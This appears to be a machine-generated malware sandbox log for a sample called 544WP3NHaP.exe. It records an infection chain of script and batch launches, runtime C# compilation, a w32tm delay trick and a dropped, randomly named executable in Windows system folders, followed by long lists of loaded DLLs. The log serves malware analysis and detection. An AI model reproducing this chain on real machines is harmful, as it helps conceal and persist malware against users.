                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\bridgemssurrogateintonet\7tLztOWB7CeM.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe "C:\bridgemssurrogateintonet/bridgeportDhcpcommon.exe"Jump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.cmdline"Jump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xNnAMDzXoE.bat" Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES26F0.tmp" "c:\Windows\System32\CSCFCD79A4B9D0A479191609B82C626EB1.TMP"Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe "C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: version.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: version.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: wldp.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: profapi.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: sspicli.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: ktmw32.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: rasapi32.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: rasman.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: rtutils.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: mswsock.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: winhttp.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: iphlpapi.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: dnsapi.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: winnsi.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: rasadhlp.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: wbemcomn.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: amsi.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: userenv.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: edputil.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: dwrite.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: winmm.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: winmmbase.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: mmdevapi.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: devobj.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: ksuser.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: avrt.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: audioses.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: powrprof.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: umpdc.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: msacm32.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: midimap.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: windowscodecs.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: ntmarta.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
